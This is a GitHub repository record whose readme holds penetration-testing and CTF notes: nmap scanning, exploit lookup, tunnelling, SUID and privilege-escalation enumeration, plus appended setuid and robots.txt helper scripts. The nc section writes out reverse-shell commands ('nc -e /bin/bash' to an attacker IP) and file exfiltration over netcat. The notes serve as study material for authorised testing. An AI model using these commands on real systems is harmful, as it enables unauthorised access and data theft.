{"id":18189864,"url":"https://github.com/bmedicke/pteh","last_synced_at":"2025-06-16T02:33:18.429Z","repository":{"id":141460965,"uuid":"304652594","full_name":"bmedicke/PTEH","owner":"bmedicke","description":"notes about 🗡️ Penetration Testing and 🦄 Ethical Hacking","archived":false,"fork":false,"pushed_at":"2022-05-16T06:43:09.000Z","size":1977,"stargazers_count":0,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-02-13T17:22:46.373Z","etag":null,"topics":["ethical-hacking","hackthebox","hackthebox-writeups","kali","kali-linux","pentesting","picoctf-writeups","security"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/bmedicke.png","metadata":{"files":{"readme":"readme.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2020-10-16T14:35:03.000Z","updated_at":"2022-05-16T06:43:12.000Z","dependencies_parsed_at":null,"dependency_job_id":"fb3b4830-5faf-4a30-bf45-a936af5cfae3","html_url":"https://github.com/bmedicke/PTEH","commit_stats":{"total_commits":175,"total_committers":1,"mean_commits":175.0,"dds":0.0,"last_synced_commit":"f1599643f4eca6c17c75858d10ede9cd77effe94"},"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/bmedicke%2FPTEH","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/bmedicke%2FPTEH/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/bmedicke%2FPTEH/releases","manifests_url":"https://repos.ecosyste.ms
/api/v1/hosts/GitHub/repositories/bmedicke%2FPTEH/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/bmedicke","download_url":"https://codeload.github.com/bmedicke/PTEH/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":247675626,"owners_count":20977376,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["ethical-hacking","hackthebox","hackthebox-writeups","kali","kali-linux","pentesting","picoctf-writeups","security"],"created_at":"2024-11-03T04:04:20.352Z","updated_at":"2025-04-07T14:49:59.026Z","avatar_url":"https://github.com/bmedicke.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"# PT𓀮EH\n\n**Notes about Penetration Testing and Ethical Hacking.**\n\n![crosshair](writeups/overthewire/media/crosshair.png)\n\n---\n\n[REED](https://github.com/bmedicke/REED) | PTEH\n\n---\n\n# toc\n\n\u003c!-- vim-markdown-toc GFM --\u003e\n\n* [the pentest process](#the-pentest-process)\n\t* [pre-engagement interactions](#pre-engagement-interactions)\n\t* [information gathering](#information-gathering)\n\t* [threat modeling](#threat-modeling)\n\t* [vulnerability analysis](#vulnerability-analysis)\n\t* [exploitation](#exploitation)\n\t* [post-exploitation](#post-exploitation)\n\t* [reporting](#reporting)\n* [CTF and wargame writeups](#ctf-and-wargame-writeups)\n* [Web Application Security](#web-application-security)\n* [enumeration](#enumeration)\n\t* [webapps](#webapps)\n* [foothold and pivot](#foothold-and-pivot)\n\t* [kali](#kali)\n\t* [linux](#linux)\n\t* 
[windows](#windows)\n* [privilege escalation](#privilege-escalation)\n\t* [linux](#linux-1)\n\t* [windows](#windows-1)\n* [bonus](#bonus)\n\t* [oneliners](#oneliners)\n\t* [kali config](#kali-config)\n\t* [kali tips](#kali-tips)\n\t* [basics](#basics)\n\t\t* [windows](#windows-2)\n\t\t* [linux](#linux-2)\n* [tools](#tools)\n\t* [find](#find)\n\t* [less](#less)\n\t* [nc](#nc)\n\t* [openssl](#openssl)\n\t* [socat and ncat](#socat-and-ncat)\n\t* [ssh](#ssh)\n\t* [Burp Suite](#burp-suite)\n\t* [sqlmap](#sqlmap)\n\t* [thc-hydra](#thc-hydra)\n\n\u003c!-- vim-markdown-toc --\u003e\n\n# the pentest process\n\nThis section follows the structure of the [Penetration Testing Execution Standard](http://www.pentest-standard.org/index.php/Main_Page) (PTES):\n\n## pre-engagement interactions\n\n## information gathering\n\n## threat modeling\n\n## vulnerability analysis\n\n## exploitation\n\n## post-exploitation\n\n## reporting\n\nDocumentation should start as soon as the pentest starts, to avoid situations\nwhere you need additional information but have already lost access to the target.\n\nCreating a mindmap is a good way to get a clear but complete picture.\n\n* useful tools:\n  * [Freemind](http://freemind.sourceforge.net/) allows attaching files, such as port scans, to nodes\n\n# CTF and wargame writeups\n\n* https://overthewire.org/ (linux)\n  * **[overthewire writeups](writeups/overthewire)** (in repo link)\n* https://underthewire.tech/ (powershell)\n* https://hackthebox.eu/\n  * **[hackthebox writeups](writeups/hackthebox)** (in repo link)\n* https://www.hacker101.com/\n* https://microcorruption.com/\n* http://smashthestack.org/\n* https://exploit-exercises.lains.space/ (mirror, original is down)\n\n# Web Application Security\n\n* **[webapp](webapp)** (in repo link)\n\n# enumeration\n\n\u003e port scanning\n\n```sh\nnmap -v $host | tee 00.nmap # fast initial scan (top 1000 TCP ports).\nnmap -A -v -sS -oA 01 -T4 $host # -sS needs root; -A adds version and script scans; -oA writes all output formats.\nnmap -A -v -sS -oA 02 -p- $host # all 65535 TCP ports.\n```\n\n\u003e finding exploits\n\n* 
google\n* https://www.rapid7.com/db/\n* https://exploit-db.com\n\n```sh\n# CLI utility for the https://exploit-db.com database:\nsearchsploit motd # search exploits for message of the day.\nsearchsploit -x 1235.c # examine a specific exploit (by path or EDB-ID).\n```\n\n## webapps\n\n* if it's a webapp/CMS/etc.:\n  * run `dirb` against it\n  * check out `robots.txt` (disallowed paths are often the interesting ones)\n  * try admin:admin credentials\n  * try default credentials\n    * `hydra`\n  * look for a copyright date in the header/footer\n    * usually not automatically generated, so it hints at how old the deployment is\n  * try some vhosts by changing the `Host` header with [Burp Suite](#burp-suite)\n\n# foothold and pivot\n\n## kali\n\n* don't forget about:\n  * `/usr/share/webshells`\n  * `/usr/share/windows-resources`\n  * `/usr/share/wordlists`\n\n\u003e serving files\n\n```sh\n# via webserver:\npython3 -m http.server 80\n\n# via samba:\nimpacket-smbserver -smb2support share .\n```\n\n\u003e reverse shells and port bindings\n\n```sh\n# netcat\nrlwrap nc -lnvp 42424\n\n# chisel\n# start the server first (attacker side), with reverse tunnels allowed:\nchisel server -v -p 12345 --reverse\n# then the client on the target, pointing at the server's port:\nchisel client -v 10.10.14.69:12345 R:8888:127.0.0.1:8888\n# R:8888:127.0.0.1:8888 = attacker's 127.0.0.1:8888 -\u003e target's 127.0.0.1:8888\n\n# plink (PuTTY's ssh client): the same kind of tunnel from a windows foothold.\n```\n\n## linux\n\n\u003e information gathering\n\n```sh\nuname -a # os and kernel version.\nid # user and groups.\nps -p $$ # which shell you are in.\nip a # or ifconfig.\nnetstat -tulpen # listening sockets (ss -tulpen on newer systems).\nlsblk # block devices.\nlocate / # list of probably every file on the system,\n# depending on under which user updatedb ran.\n\nfind / -type f -perm -4000 2\u003e/dev/null # setuid executables.\n# if any of these have an exploit they can be used\n# to elevate privileges to root.\n\n# pretty print of home files:\nfind /home -type f -printf \"%f\\t%p\\t%u\\t%g\\t%m\\n\" 2\u003e/dev/null | column -t | tee files\ndpkg -l # list of installed packages (and versions)\n```\n\n\u003e downloading files\n\n* on Linux you should save your files to `/dev/shm` (the ramdisk)\n  * type `mount | grep shm` to see that it is a tmpfs filesystem\n  * it gets wiped on unmount (you 
could clean up with `umount /dev/shm`, which also disturbs anything else using it)\n  * other choices:\n    * `/tmp` gets wiped on reboot (might be tmpfs)\n    * `/var/tmp` persists between reboots (not tmpfs)\n\n```sh\n# linux download:\nwget $h/file\ncurl $h/file -so file # -s silent, -o output file.\n```\n\n\u003e info gathering with external tools\n\n```sh\n./linpeas.sh -a\n```\n\n## windows\n\n\u003e information gathering\n\n```sh\ndir /q # includes file owners.\nwhoami /all # user, groups and privileges.\nsysteminfo # os version, hotfixes, domain.\nset # environment variables.\ntasklist\nipconfig /all\nnetstat -nao | findstr 127 | findstr LISTEN # services bound to loopback only (port forwarding candidates).\n\n# services\npowershell -c \"Get-Service | Format-Table -AutoSize\"\nsc # query/stop/start services (sc query, sc start name).\nnet start # old (from DOS), lists running services.\n```\n\n\u003e downloading files\n\n```sh\n# powershell:\niwr hostname/file.exe -outf file.exe\n# long version:\nInvoke-WebRequest hostname/file.exe -OutFile file.exe\n```\n\n\u003e info gathering with external tools\n\n```sh\nwinpeas.exe\nwinpeas.bat # if the exe fails (it needs a .NET Framework runtime).\n```\n\n# privilege escalation\n\n## linux\n\n* Kernel 2.6.22 to 4.8.3: Dirty COW, CVE-2016-5195 (`dirty.c`)\n\n## windows\n\n# bonus\n## oneliners\n\n```sh\n# upgrade shell:\npython -c 'import pty;pty.spawn(\"bash\")'\n\n# fix environment:\nexport TERM=linux\n\n# logging a reverse shell locally:\nscript # stop with ^D. breaks in vi. 
finicky.\n\n# get a temp dir:\ncd $(mktemp -d)\n\n# get local connections:\nnetstat -tulpen\n```\n\n## kali config\n\n```sh\n# pip2 for new Kalis (pypa keeps the last python2-compatible installer under pip/2.7):\ncurl -s https://bootstrap.pypa.io/pip/2.7/get-pip.py | python2\npip2 install requests colorama # common dependencies of python2 exploit scripts.\npip2 install xlrd # for windows exploit suggester.\napt install ncdu\n\npip3 install cve_searchsploit # https://github.com/andreafioraldi/cve_searchsploit\n# update it:\ncve_searchsploit -u\n\ncd /opt\ngit clone 'https://github.com/AonCyberLabs/Windows-Exploit-Suggester.git'\ncd Windows-Exploit-Suggester\npython windows-exploit-suggester.py --update\npython windows-exploit-suggester.py --help\n\n# chisel\ncd /opt\nwget 'https://github.com/jpillora/chisel/releases/download/v1.7.1/chisel_1.7.1_windows_386.gz'\nwget 'https://github.com/jpillora/chisel/releases/download/v1.7.1/chisel_1.7.1_linux_386.gz'\ngunzip chisel*\nmv chisel*windows* chisel.exe\n```\n\n```sh\n# metasploit\nsudo service postgresql start\nsudo msfdb init\nmsfconsole # check the database connection with db_status inside the console.\n```\n\n## kali tips\n\n* ranger disables previews for root (enable them on a case-by-case basis with `zp`)\n\n## basics\n### windows\n\n```sh\n# windows get cmd.exe help:\nhelp\n\n# powershell\ncd $env:tmp\n\n# cmd.exe\ncd %tmp%\n```\n\n### linux\n\n```sh\numask -S # file creation mask.\n# help umask (linux)\n\nsudo -l # list the commands this user may (and may not) run via sudo.\n\nsudo -u kali whoami # run whoami as kali.\n\nbase64 # great for exfiltration without inet.\n# then just copy the text from the terminal.\n# -d to decode it again.\n# use pipes or pass a filename.\n\nstrings -e l file # -e selects the encoding; l = 16-bit little endian (UTF-16 strings in windows binaries).\n\nfind . 
# get list of all files in dir.\n# great for lots of files/folders with spaces\n# where autocompletion is broken.\n\nxdotool # fake keyboard and mouse input in X.\n```\n\n# tools\n\n## find\n\n```sh\n# look for binaries with SUID:\nfind / -perm -4000 2\u003e/dev/null\n```\n\n## less\n\n\u003e read raw control chars (colors).\n```sh\n./linpeas.sh | less -R\n```\n\n* less uses many vim bindings\n* press `h` for help\n* press `s` to save to a file\n* `G` then `g` jumps to the end and back; once less has seen the end, `^G` shows the position as a percentage\n\n## nc\n\n\u003e reverse shell\n```sh\n# attacker:\nnc -lnvp 12345\n\n# attackee:\nnc -e /bin/bash 10.10.14.69 12345 # needs a netcat built with -e (netcat-traditional, ncat); OpenBSD nc has no -e.\nnc -e cmd.exe 10.10.14.69 12345 # windows.\n```\n\n\u003e exfiltration by piping over the network\n```sh\n# attacker:\nnc -lnvp 12345 \u003e exfil_file\n\n# attackee:\nnc -q0 10.10.14.69 12345 \u003c exfil_file # -q0: close once stdin hits EOF.\n\n# on both:\nmd5sum exfil_file # and compare hashes to verify the transfer.\n```\n\n* commands this can be useful for: `dd`, `tar` (tar pipe)\n\n\u003e check for open port\n```sh\nnc -vvz localhost 443\n\n# multiple\nnc -vvz localhost 80 8080\n\n# or a range\nnc -vvz localhost 1-1024 2\u003e\u00261 | grep -v refused\n```\n\n## openssl\n\n* [man pages](https://www.openssl.org/docs/manmaster/man1/)\n  * `man openssl`\n  * `-help` flag for subcommands\n* for SSL connections:\n  * `s_client` and `s_server` subcommands\n    * `openssl s_client -connect localhost:443`\n    * `openssl s_server`\n* for hashing:\n  * `echo hello | openssl sha1`\n  * `openssl md5 test_file`\n* for encoding:\n  * `openssl base64 -in test_file`\n* for encryption (symmetric, via `enc`; `-pbkdf2` derives the key from the passphrase properly, `-d` decrypts):\n  * `openssl enc -chacha20 -pbkdf2 -in test_file -out test_file.enc`\n  * `openssl enc -aes-256-cbc -pbkdf2 -in test_file -out test_file.enc`\n\n## socat and ncat\n\n* for encrypted shells/exfiltration\n\n## ssh\n\n\u003e local port forwarding\n\n```sh\nssh -N kali -L 0.0.0.0:8080:tabby:8080 -L 0.0.0.0:80:tabby:80\n# binds tabby's 80 and 8080 to all interfaces on the executing machine\n# (binding port 80 locally needs root).\n```\n\n## Burp Suite\n\n* [Burp Suite](burp)\n\n## sqlmap\n\n## 
thc-hydra\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fbmedicke%2Fpteh","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fbmedicke%2Fpteh","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fbmedicke%2Fpteh/lists"}
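
The linux information-gathering section of the readme above runs `find / -perm -4000` and notes that any setuid binary with a known exploit is a route to root. Added example, not code from the PTEH repository: a small POSIX shell helper that lists setuid executables under a root directory and diffs them against a saved baseline, so a binary that gained the bit since the last look (a custom helper in `/opt`, a copied shell) stands out instead of being lost among the stock `passwd`/`sudo` entries. The directory layout, the baseline file and the `demo` function are constructed for the example.

```shell
#!/bin/sh
# Added example (not from the PTEH notes): setuid inventory with a baseline diff.

# list_setuid ROOT
#   Absolute paths of regular files under ROOT with the setuid bit, sorted.
#   -xdev stays on one filesystem (skips /proc, /sys, network mounts);
#   stderr is dropped because an unprivileged user cannot enter every directory.
list_setuid() {
  find "$1" -xdev -type f -perm -4000 2>/dev/null | sort
}

# setuid_report ROOT
#   Same listing with owner and mode, which is what goes into the notes:
#   a root-owned 4755 binary is the interesting case.
setuid_report() {
  list_setuid "$1" | while IFS= read -r f; do
    ls -ld "$f"
  done
}

# new_setuid ROOT BASELINE
#   Paths present now but absent from BASELINE (one path per line, any order).
#   comm(1) needs both inputs sorted, so the baseline is sorted into a temp file.
new_setuid() {
  tmp=$(mktemp) || return 1
  sort "$2" > "$tmp"
  list_setuid "$1" | comm -13 "$tmp" -
  rm -f "$tmp"
}

# demo
#   Builds a throwaway tree (constructed for the example), records a baseline
#   containing only the expected passwd binary, then shows the one that is new.
demo() {
  root=$(mktemp -d)
  mkdir -p "$root/usr/bin" "$root/opt/app"
  : > "$root/usr/bin/passwd";  chmod 4755 "$root/usr/bin/passwd"   # expected
  : > "$root/usr/bin/ls";      chmod 0755 "$root/usr/bin/ls"       # not setuid
  : > "$root/opt/app/helper";  chmod 4755 "$root/opt/app/helper"   # the surprise
  printf '%s\n' "$root/usr/bin/passwd" > "$root/baseline.txt"
  echo "all setuid files:";   setuid_report "$root"
  echo "new since baseline:"; new_setuid "$root" "$root/baseline.txt"
  rm -rf "$root"
}

# On a real target: list_setuid / > setuid.txt when you land, then
# new_setuid / setuid.txt later. "sh this_file.sh demo" shows the mechanics offline.
case "${1:-}" in demo) demo ;; esac
```

The baseline can also come from a clean image of the same distribution, which turns the diff into a quick check for binaries that were never meant to be setuid at all.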
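
The webapps checklist in the readme above says to read `robots.txt` and to look for a copyright date in the header or footer. Added example, not code from the PTEH repository: a POSIX shell/awk helper that pulls those hints out of saved responses (for instance `curl -s $h/robots.txt > robots.txt` and `curl -s $h/ > index.html`), plus the `<meta name="generator">` tag, which often leaks the CMS and its version. The sample robots.txt and HTML in `demo` are constructed; the parsing assumes double-quoted attribute values and a year within 40 characters after a `copyright`, `&copy;`, `(c)` or `©` marker.

```shell
#!/bin/sh
# Added example (not from the PTEH notes): cheap hints from saved web responses.

# robots_paths FILE
#   Paths from Disallow:/Allow: lines, comments and CRs stripped, deduplicated.
#   Disallowed paths are a free map of admin panels, backups and staging areas.
robots_paths() {
  tr -d '\r' < "$1" | awk '
    {
      key = $0; sub(/:.*$/, "", key); sub(/^[ \t]+/, "", key); key = tolower(key)
      if (key != "disallow" && key != "allow") next
      val = $0; sub(/^[^:]*:[ \t]*/, "", val); sub(/[ \t]*(#.*)?$/, "", val)
      if (val != "") print val
    }' | sort -u
}

# copyright_year FILE
#   Newest plausible year within 40 characters after a copyright marker.
#   Footers are usually hand-maintained, so this dates the deployment.
copyright_year() {
  tr -d '\r\n' < "$1" | awk '
    {
      s = tolower($0); best = ""
      while (match(s, /copyright|&copy;|\(c\)|©/)) {
        end = RSTART + RLENGTH
        win = substr(s, end, 40)
        while (match(win, /[0-9][0-9][0-9][0-9]/)) {
          y = substr(win, RSTART, 4)
          if (y >= "1990" && y <= "2099" && y > best) best = y
          win = substr(win, RSTART + 4)
        }
        s = substr(s, end)
      }
      if (best != "") print best
    }'
}

# meta_generator FILE
#   content="..." of a <meta name="generator"> tag (assumes double quotes).
meta_generator() {
  tr -d '\r\n' < "$1" | tr '<' '\n' | awk -v q='"' '
    tolower($0) ~ /^meta[ \t]/ && tolower($0) ~ /generator/ {
      if (match($0, "content=" q "[^" q "]*"))
        print substr($0, RSTART + 9, RLENGTH - 9)   # drop the content=" prefix
    }'
}

# webapp_hints ROBOTS_FILE HTML_FILE: one labelled line per finding.
webapp_hints() {
  robots_paths "$1" | sed 's/^/robots path: /'
  y=$(copyright_year "$2"); [ -n "$y" ] && echo "copyright year: $y"
  g=$(meta_generator "$2"); [ -n "$g" ] && echo "generator: $g"
  return 0
}

# demo: constructed responses standing in for curl output.
demo() {
  d=$(mktemp -d)
  printf 'User-agent: *\r\nDisallow: /admin/\r\nDisallow: /backup/  # old dumps\r\nAllow: /public/\r\nDisallow:\r\nSitemap: https://example.test/sitemap.xml\r\n' > "$d/robots.txt"
  printf '<html><head><meta name="generator" content="WordPress 5.8"></head>\n<body><footer>Copyright (c) 2016-2021 Example Corp. &copy; 2019 Other Ltd.</footer></body></html>\n' > "$d/index.html"
  webapp_hints "$d/robots.txt" "$d/index.html"
  rm -rf "$d"
}

case "${1:-}" in demo) demo ;; esac
```

The robots paths feed straight into `dirb`/`gobuster` as a custom wordlist, and the generator string is what you would search in exploit-db with `searchsploit`.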